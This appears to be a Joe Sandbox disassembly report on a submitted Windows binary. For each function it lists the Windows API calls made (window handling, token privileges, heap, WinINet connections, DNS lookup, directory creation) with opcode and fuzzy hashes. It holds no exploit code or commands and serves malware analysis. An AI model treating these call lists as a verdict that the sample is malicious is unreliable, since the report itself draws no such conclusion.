                                                                                                                • Instruction ID: 6b6e0c40eeab9f3a1867b55fe8542fda40d9fff6be3d9d22869567df0a1375ea
                                                                                                                • Opcode Fuzzy Hash: 4a1d14332988943ad05474fe470394212723d64b182553490ea2cead552e45ef
                                                                                                                • Instruction Fuzzy Hash: BB313EB1D00108AFDB44EFB5C8859EFB7FAEF98300F10456AE415E7242EA719E05CBA5
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00602612: GetWindowLongW.USER32(?,000000EB), ref: 00602623
                                                                                                                • GetCursorPos.USER32(?), ref: 0068C4D2
                                                                                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0063B9AB,?,?,?,?,?), ref: 0068C4E7
                                                                                                                • GetCursorPos.USER32(?), ref: 0068C534
                                                                                                                • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0063B9AB,?,?,?), ref: 0068C56E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2864067406-0
                                                                                                                • Opcode ID: 1661b6153b95190befa29078a0cd3f1573fbd0d9b2f3358f859b5998ca2a92ea
                                                                                                                • Instruction ID: efa7b635cd7383fa2312f08ccd264a246ea7b151e86334ab5aee866d8f7c79df
                                                                                                                • Opcode Fuzzy Hash: 1661b6153b95190befa29078a0cd3f1573fbd0d9b2f3358f859b5998ca2a92ea
                                                                                                                • Instruction Fuzzy Hash: E7316D35600058BFCF259F58CC58EFA7BB7EB09320F444269F9058B361C731A9A1DBA5
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0065810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00658121
                                                                                                                  • Part of subcall function 0065810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0065812B
                                                                                                                  • Part of subcall function 0065810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0065813A
                                                                                                                  • Part of subcall function 0065810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00658141
                                                                                                                  • Part of subcall function 0065810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00658157
                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 006586A3
                                                                                                                • _memcmp.LIBCMT ref: 006586C6
                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 006586FC
                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00658703
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                                                • String ID:
                                                                                                                • API String ID: 1592001646-0
                                                                                                                • Opcode ID: 4bad78c3a320d2a3f7edcb537df89e66e871cc51504fbad040f387bcd4e6e351
                                                                                                                • Instruction ID: 353b64c0adc7bdebe63ea424e990f26947d4e4f9eb220c323954e1e3f133e256
                                                                                                                • Opcode Fuzzy Hash: 4bad78c3a320d2a3f7edcb537df89e66e871cc51504fbad040f387bcd4e6e351
                                                                                                                • Instruction Fuzzy Hash: 6921AF71E01109EFDB10DFA4C989BEEB7BAEF54306F154099E844BB240DB31AE09CB90
                                                                                                                APIs
                                                                                                                • __setmode.LIBCMT ref: 006209AE
                                                                                                                  • Part of subcall function 00605A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00667896,?,?,00000000), ref: 00605A2C
                                                                                                                  • Part of subcall function 00605A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00667896,?,?,00000000,?,?), ref: 00605A50
                                                                                                                • _fprintf.LIBCMT ref: 006209E5
                                                                                                                • OutputDebugStringW.KERNEL32(?), ref: 00655DBB
                                                                                                                  • Part of subcall function 00624AAA: _flsall.LIBCMT ref: 00624AC3
                                                                                                                • __setmode.LIBCMT ref: 00620A1A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                                                                • String ID:
                                                                                                                • API String ID: 521402451-0
                                                                                                                • Opcode ID: 4c961302bf278eee794b021b58b73903216234d200eead22746d0b92e7861581
                                                                                                                • Instruction ID: 576dadf28afcac9ec831471656b69ef55d8d77ae2bbeebae2945dde8aba07c6d
                                                                                                                • Opcode Fuzzy Hash: 4c961302bf278eee794b021b58b73903216234d200eead22746d0b92e7861581
                                                                                                                • Instruction Fuzzy Hash: 8A115732A44A146FDB44B7B4BC869FEB7AB9F41320F20011DF106672C3EE2049464BA9
                                                                                                                APIs
                                                                                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 006717A3
                                                                                                                  • Part of subcall function 0067182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0067184C
                                                                                                                  • Part of subcall function 0067182D: InternetCloseHandle.WININET(00000000), ref: 006718E9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Internet$CloseConnectHandleOpen
                                                                                                                • String ID:
                                                                                                                • API String ID: 1463438336-0
                                                                                                                • Opcode ID: 20f7e5c3e121f1a115fe238232da3e8ce3f9f872d29ac5bba8d0391fea804544
                                                                                                                • Instruction ID: bfcca8c59c26b77ef92801c786b190222128a639cadc2d904ab9137d1c154f55
                                                                                                                • Opcode Fuzzy Hash: 20f7e5c3e121f1a115fe238232da3e8ce3f9f872d29ac5bba8d0391fea804544
                                                                                                                • Instruction Fuzzy Hash: 6821A431200605BFEB169F64DC01FBABBEBFF49710F10812EF9199A650D771D811A7A5
                                                                                                                APIs
                                                                                                                • GetFileAttributesW.KERNEL32(?,0068FAC0), ref: 00663A64
                                                                                                                • GetLastError.KERNEL32 ref: 00663A73
                                                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00663A82
                                                                                                                • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0068FAC0), ref: 00663ADF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 2267087916-0
                                                                                                                • Opcode ID: 42f8a8c8154a3cc360a363917041519877125f9aba546a7af4f2359647cc2263
                                                                                                                • Instruction ID: 3343d64a4f1c7acaa266b85047eb6a97c51978f655a2c47cd21ee1a09b6aa0e6
                                                                                                                • Opcode Fuzzy Hash: 42f8a8c8154a3cc360a363917041519877125f9aba546a7af4f2359647cc2263
                                                                                                                • Instruction Fuzzy Hash: CE21B1305082119FC300EF68C8818ABB7E6AE59364F144A2DF499C73E1D7319E06DB82
                                                                                                                APIs
                                                                                                                • _free.LIBCMT ref: 00635101
                                                                                                                  • Part of subcall function 0062571C: __FF_MSGBANNER.LIBCMT ref: 00625733
                                                                                                                  • Part of subcall function 0062571C: __NMSG_WRITE.LIBCMT ref: 0062573A
                                                                                                                  • Part of subcall function 0062571C: RtlAllocateHeap.NTDLL(01410000,00000000,00000001,00000000,?,?,?,00620DD3,?), ref: 0062575F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap_free
                                                                                                                • String ID:
                                                                                                                • API String ID: 614378929-0
                                                                                                                • Opcode ID: cd1fc48e7c43dd66f166d75eaf1e9fea2f5bef764afa39a955f6bcd7b5b06759
                                                                                                                • Instruction ID: 5c4641c4dcc8190cc3409e64d61d5777e012f1b7c039626c76b49427922cd3b1
                                                                                                                • Opcode Fuzzy Hash: cd1fc48e7c43dd66f166d75eaf1e9fea2f5bef764afa39a955f6bcd7b5b06759
                                                                                                                • Instruction Fuzzy Hash: 42119E72901E25AFCF712F74BC45BAE379B9B143A2F10492EF9069B250DE3489419BD8
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00605A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00667896,?,?,00000000), ref: 00605A2C
                                                                                                                  • Part of subcall function 00605A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00667896,?,?,00000000,?,?), ref: 00605A50
                                                                                                                • gethostbyname.WSOCK32(?,?,?), ref: 00676399
                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 006763A4
                                                                                                                • _memmove.LIBCMT ref: 006763D1
                                                                                                                • inet_ntoa.WSOCK32(?), ref: 006763DC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                                                                • String ID:
                                                                                                                • API String ID: 1504782959-0
                                                                                                                • Opcode ID: b6ae99012836a577ab9c103c046545f5b70bb46745b8d627930b57c2f53b87bc
                                                                                                                • Instruction ID: 69b8877d4d16c5fdb01c5bf5a6ca9d222396dd2e42b8200c6e3f679d38b14e03
                                                                                                                • Opcode Fuzzy Hash: b6ae99012836a577ab9c103c046545f5b70bb46745b8d627930b57c2f53b87bc
                                                                                                                • Instruction Fuzzy Hash: 5A115E71600109AFCB44FBA4DD46CEFB7BAAF04310B148169F506A72A2DB30AE14CB65
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 00658B61
                                                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00658B73
                                                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00658B89
                                                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00658BA4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 3850602802-0
                                                                                                                • Opcode ID: 8c46b2523b04225db20c5479b40b299e5b6f4ddd944c84921347660d180f21d7
                                                                                                                • Instruction ID: ed25ceecce4452de76d06c9245664a90ea619538e5640a21d3600b537929cd5b
                                                                                                                • Opcode Fuzzy Hash: 8c46b2523b04225db20c5479b40b299e5b6f4ddd944c84921347660d180f21d7
                                                                                                                • Instruction Fuzzy Hash: 2F115A79900218FFEB10DFA5CC84FADBBB9FB48710F2041A5EA00B7290DA716E11DB94
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00602612: GetWindowLongW.USER32(?,000000EB), ref: 00602623
                                                                                                                • DefDlgProcW.USER32(?,00000020,?), ref: 006012D8
                                                                                                                • GetClientRect.USER32(?,?), ref: 0063B5FB
                                                                                                                • GetCursorPos.USER32(?), ref: 0063B605
                                                                                                                • ScreenToClient.USER32(?,?), ref: 0063B610
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 4127811313-0
                                                                                                                • Opcode ID: 6f277c0608e9b45442829097c78cfc7b134d761326581643355e6ebb46fc0feb
                                                                                                                • Instruction ID: 6565082bb7d050af87bcee1eb824b63e7bb8c9aaefa56a5e8b67486dc3aef6a7
                                                                                                                • Opcode Fuzzy Hash: 6f277c0608e9b45442829097c78cfc7b134d761326581643355e6ebb46fc0feb
                                                                                                                • Instruction Fuzzy Hash: 76112835540019FBCB04EFA8D8899FF77BAEB06300F400956F901EB280D730BA918BA9
                                                                                                                APIs
                                                                                                                • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0065D84D
                                                                                                                • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 0065D864
                                                                                                                • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0065D879
                                                                                                                • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 0065D897
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Type$Register$FileLoadModuleNameUser
                                                                                                                • String ID:
                                                                                                                • API String ID: 1352324309-0
                                                                                                                • Opcode ID: ff2082c738179c3bc109dcff6ae8d5051185d277ba145c89260e11fc47c9cebd
                                                                                                                • Instruction ID: cf2e36bd052bf1bd8fbe31e50e4dc50707e991c20b04965a72ac73ca041ab04d
                                                                                                                • Opcode Fuzzy Hash: ff2082c738179c3bc109dcff6ae8d5051185d277ba145c89260e11fc47c9cebd
                                                                                                                • Instruction Fuzzy Hash: 1E116175605304EBE3308F50EC08F93BBFDEB00B01F108669EA56D6191D7B0E54D9BA1
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                • String ID:
                                                                                                                • API String ID: 3016257755-0
                                                                                                                • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                • Instruction ID: 08969cc09e878bfd8bd64d642ecc52c1ac7d2e8e3240887de56167f6d13ea632
                                                                                                                • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                • Instruction Fuzzy Hash: E2014BB244814ABBCF2A5E84CC42CEE3F63BB18355F588419FA1859131D336C9B1ABC1
                                                                                                                APIs
                                                                                                                • GetWindowRect.USER32(?,?), ref: 0068B2E4
                                                                                                                • ScreenToClient.USER32(?,?), ref: 0068B2FC
                                                                                                                • ScreenToClient.USER32(?,?), ref: 0068B320
                                                                                                                • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0068B33B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 357397906-0
                                                                                                                • Opcode ID: 126695cca00ab864e1046336968bfff823e785cabdd926b0d97c70332b3bb4f4
                                                                                                                • Instruction ID: 0c251d402c38dffd67d90344942c12c6431808eb806d8f8d1b83a162710d9f2a
                                                                                                                • Opcode Fuzzy Hash: 126695cca00ab864e1046336968bfff823e785cabdd926b0d97c70332b3bb4f4
                                                                                                                • Instruction Fuzzy Hash: AD114775D00209EFDB41DF99C4449EEBBF5FF18310F105266E914E3220D735AA558F50
                                                                                                                APIs
                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 00666BE6
                                                                                                                  • Part of subcall function 006676C4: _memset.LIBCMT ref: 006676F9
                                                                                                                • _memmove.LIBCMT ref: 00666C09
                                                                                                                • _memset.LIBCMT ref: 00666C16
                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 00666C26
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 48991266-0
                                                                                                                • Opcode ID: f7908b1ba95ae0818f44ba77368652dec90e3740b665d4c7344aafe68e6778ea
                                                                                                                • Instruction ID: 33b7a9c0201ac74b8bdd42d3d231617d32361a07fb0c305627dd4164f1a50829
                                                                                                                • Opcode Fuzzy Hash: f7908b1ba95ae0818f44ba77368652dec90e3740b665d4c7344aafe68e6778ea
                                                                                                                • Instruction Fuzzy Hash: 58F0543A100110BBCF416F95EC85A4ABF2AEF45321F048065FE085F227D735E911CBB8
                                                                                                                APIs
                                                                                                                • GetSysColor.USER32(00000008), ref: 00602231
                                                                                                                • SetTextColor.GDI32(?,000000FF), ref: 0060223B
                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 00602250
                                                                                                                • GetStockObject.GDI32(00000005), ref: 00602258
                                                                                                                • GetWindowDC.USER32(?,00000000), ref: 0063BE83
                                                                                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 0063BE90
                                                                                                                • GetPixel.GDI32(00000000,?,00000000), ref: 0063BEA9
                                                                                                                • GetPixel.GDI32(00000000,00000000,?), ref: 0063BEC2
                                                                                                                • GetPixel.GDI32(00000000,?,?), ref: 0063BEE2
                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 0063BEED
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1946975507-0
                                                                                                                • Opcode ID: d221879e6a647d5ed4cd63a568d62eebff98431ac6ac4221c467f44c99d33133
                                                                                                                • Instruction ID: 636e604438b3215f59625b33db8e7e2773e3feafd5c93369c3aa31ec89faa692
                                                                                                                • Opcode Fuzzy Hash: d221879e6a647d5ed4cd63a568d62eebff98431ac6ac4221c467f44c99d33133
                                                                                                                • Instruction Fuzzy Hash: 8CE06D32104244FADF215FA8FC4D7D83F12EB15332F109366FBA9480E187B24990DB12
                                                                                                                APIs
                                                                                                                • GetCurrentThread.KERNEL32 ref: 0065871B
                                                                                                                • OpenThreadToken.ADVAPI32(00000000,?,?,?,006582E6), ref: 00658722
                                                                                                                • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,006582E6), ref: 0065872F
                                                                                                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,006582E6), ref: 00658736
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
